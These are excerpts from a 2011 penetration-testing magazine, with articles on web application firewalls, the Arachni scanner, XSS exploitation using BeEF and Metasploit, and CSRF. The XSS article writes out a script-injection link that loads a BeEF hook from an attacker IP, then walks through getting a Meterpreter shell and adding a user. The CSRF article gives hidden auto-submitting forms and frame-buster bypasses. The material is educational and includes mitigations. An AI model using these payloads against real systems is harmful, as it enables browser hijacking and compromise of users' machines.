The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code programming that sensibly combines effectiveness, functionality and security still has top priority. The safer a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory, but actually complement each other. Analogous to flight traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also provide load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, valid number of characters and permitted value area.
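The parameter rules just described can be condensed into a few lines of validation logic. The following JavaScript sketch is purely illustrative — the rule values and the names rule and checkRequest are invented, not taken from any real WAF product:

```javascript
// A toy WAF-style rule for one monitored entry form: limit the number
// of parameters and constrain each value's length and character set.
const rule = {
  maxParams: 2,                   // e.g. the form defines two parameters
  maxLength: 64,                  // maximum value length
  allowed: /^[A-Za-z0-9 .,@-]*$/, // permitted value area (character whitelist)
};

function checkRequest(params, rule) {
  const names = Object.keys(params);
  if (names.length > rule.maxParams) return false; // block three or more parameters
  return names.every((name) => {
    const value = String(params[name]);
    return value.length <= rule.maxLength && rule.allowed.test(value);
  });
}

// A request smuggling a script tag in is blocked:
checkRequest({ search: '<script>alert(1)</script>' }, rule); // → false
```

A real WAF applies the same idea per form and per parameter, driven by its configuration rather than hard-coded values.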
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or brute-force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 http://pentestmag.com 01/2011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application; whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order entry page.
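The combined approach can be sketched in a few lines of Ruby: a blacklist of known attack signatures applies everywhere, while a learned whitelist profile is enforced only for high-value paths. All paths, patterns and names below are illustrative assumptions, not a vendor's rule set:

```ruby
BLACKLIST = [/<script/i, /union\s+select/i]   # known attack signatures
WHITELIST_PROFILES = {                         # learned per-URL profiles
  '/order' => { 'item' => /\A\d+\z/, 'qty' => /\A\d{1,3}\z/ }
}

def permit?(path, params)
  # The blacklist applies to every request.
  return false if params.values.any? { |v| BLACKLIST.any? { |re| v =~ re } }
  # The whitelist profile applies only to high-value sub-sections.
  profile = WHITELIST_PROFILES[path]
  return true unless profile
  params.all? { |k, v| profile[k] && v =~ profile[k] }
end
```

A request to an unprofiled page passes as long as it carries no blacklisted pattern; a request to the order page must additionally match the learned parameter profile.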
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that are in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests into the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured to match the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
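The outgoing-traffic check described here, spotting sensitive data such as card numbers leaving the application, typically combines a pattern match with a Luhn checksum to cut false positives. The following Ruby sketch is an illustration of that idea under assumed names, not any vendor's implementation:

```ruby
PAN_PATTERN = /\b\d{13,16}\b/   # candidate card numbers in a response body

# Luhn checksum: doubles every second digit from the right and checks mod 10.
def luhn_valid?(digits)
  sum = digits.reverse.chars.each_with_index.sum do |ch, i|
    d = ch.to_i
    d *= 2 if i.odd?
    d > 9 ? d - 9 : d
  end
  sum % 10 == 0
end

# Returns true if the response body appears to leak a primary account number.
def leaks_pan?(body)
  body.scan(PAN_PATTERN).any? { |candidate| luhn_valid?(candidate) }
end
```

A response containing the well-known test number 4111111111111111 would be flagged, while an arbitrary 13-digit ticket number that fails the checksum would pass through unblocked.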
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest:

Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation, namely in the online gambling industry
Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP VULNERABILITIES
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and enable you to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and so on.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
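The include/exclude semantics just described can be illustrated in a few lines of Ruby. This mimics the documented behaviour of the --mods switch under assumed module names; it is not Arachni's actual implementation:

```ruby
# Illustrative module names, not Arachni's full module list.
ALL_MODS = %w[xss_tag xss_uri sqli csrf backup_files]

# patterns: e.g. ['*', '-xss_*'] -- a leading '-' excludes matching modules.
def select_mods(patterns, mods = ALL_MODS)
  includes, excludes = patterns.partition { |p| !p.start_with?('-') }
  to_re = ->(glob) { Regexp.new('\A' + Regexp.escape(glob).gsub('\*', '.*') + '\z') }
  mods.select do |m|
    includes.any? { |p| m =~ to_re.(p) } &&
      excludes.none? { |p| m =~ to_re.(p.delete_prefix('-')) }
  end
end
```

So select_mods(['*', '-xss_*']) keeps every module except the XSS-related ones, matching the command shown above.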
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute
  and modify this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common directories on the server, based on
# wordlists generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) do |file|
            @@__directories << file unless file.include?( '.' )
        end
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each do |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) do |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            end
        end

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed,
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple PoC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1 User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box popping up on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text input, the attacker enters a piece of JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the User's Browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball, copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4. What the attacker will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point in time, we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network, or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
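The output-encoding step above can be as simple as HTML-escaping every reflected value before it is written to the page. The article's vulnerable example is PHP (where htmlspecialchars() plays the same role); here is a minimal Ruby sketch of the same idea, with an illustrative function name:

```ruby
require 'cgi'

# Reflecting user input safely: escape it so that injected markup is
# rendered as inert text instead of being executed by the browser.
def render_search_result(user_input)
  "The parameter passed is #{CGI.escapeHTML(user_input)}"
end
```

With this in place, the PoC payload <script>alert(document.domain)</script> is reflected as harmless text (&lt;script&gt;...) and never runs in the victim's browser.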
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words, it is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: this stops simple link-based attacks (IMG, iframes, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to fill in the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com" />
    <input type="submit" />
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed.
<script type="text/javascript">
    if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
One-time tokens are usually subverted by brute force attacks. Brute forcing one-time tokens is worthwhile for attackers only because the mechanism is so widely used by web developers. For example, the following PHP code:
<?php
    $token = md5(uniqid(rand(), TRUE));
    $_SESSION['token'] = $token;
?>
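As an aside not found in the original article: the PHP snippet above derives the token from time-based seeds (uniqid()/rand()), which modern guidance considers guessable. A minimal sketch of the same idea with a cryptographically secure source, written here in Python with illustrative function names:

```python
import hmac
import secrets

def new_token():
    # 128 bits from the OS CSPRNG: not predictable from timestamps,
    # unlike md5(uniqid(rand(), TRUE))
    return secrets.token_hex(16)

def token_valid(session_token, submitted_token):
    # constant-time comparison avoids leaking timing information
    return hmac.compare_digest(session_token, submitted_token)

token = new_token()  # store in the session and in the hidden form field
print(token_valid(token, token))        # True
print(token_valid(token, new_token()))  # False
```

The comparison step matters as much as generation: a plain string comparison can leak how many leading characters matched.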
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
    <title>GOOD.COM</title>
</head>
<body>
<?php
    $token = md5(uniqid(rand(), true));
    $_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
    <input type="text" name="message">
    <input type="submit" value="Post">
    <input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
    session_start();
    if ($_SESSION['token'] == $_POST['token']) {
        $message = $_POST['message'];
        echo "<b>Message:</b><br>" . $message;
        $file = fopen("messages.txt", "a");
        fwrite($file, $message . "\r\n");
        fclose($file);
    } else {
        echo "Bad request";
    }
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
    window.onbeforeunload = function() {
        return "Do you want to leave this page?";
    }
</script>
<iframe src="http://www.good.com"></iframe>
Method 2. Using double framing

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
    if (self == top) {
        document.documentElement.style.display = 'block';
    } else {
        top.location = self.location;
    }
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
